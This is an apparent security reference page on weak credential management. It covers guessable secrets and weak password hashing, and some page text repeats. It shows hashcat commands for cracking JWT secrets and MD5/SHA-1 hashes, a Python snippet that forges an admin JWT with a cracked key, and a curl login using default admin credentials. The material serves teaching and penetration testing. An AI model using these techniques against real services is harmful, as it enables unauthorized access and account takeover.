Weak Credential Management

Known or Guessable Secrets

Using secrets that are easily guessed or commonly found in wordlists can compromise the entire service.

Compromises in authentication systems

JWT (HS256) secret key crack

hashcat -m 16500 -a 0 hash.txt rockyou.txt

Creating a forged JWT

import jwt

secret_key = "secret123" #secret key cracked with hashcat

payload = {
    "sub": "user_123",
    "role": "admin"
}

token = jwt.encode(payload, secret_key, algorithm="HS256")
print(f"Generated JWT: {token}")

Easily guessable admin credentials

curl -X POST -d "username=admin&password=admin" https://[VULNERABLE-SERVICE]/login

Weak Encryption of Secrets

Using weak encryption algorithms enables faster decryption, potentially leading to further attacks. (e.g., credential stuffing)

Cracking MD5 or SHA-1 hashed passwords
```
hashcat -m 0 -a 0 hash.txt wordlist.txt
```

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Weak_Credential_Management.md

Weak_Credential_Management.md

Weak Credential Management

Table of Contents

Known or Guessable Secrets

Using secrets that are easily guessed or commonly found in wordlists can compromise the entire service.

Weak Encryption of Secrets

Using weak encryption algorithms enables faster decryption, potentially leading to further attacks. (e.g., credential stuffing)

Files

Weak_Credential_Management.md

Latest commit

History

Weak_Credential_Management.md

File metadata and controls

Weak Credential Management

Table of Contents

Known or Guessable Secrets

Using secrets that are easily guessed or commonly found in wordlists can compromise the entire service.

Weak Encryption of Secrets

Using weak encryption algorithms enables faster decryption, potentially leading to further attacks. (e.g., credential stuffing)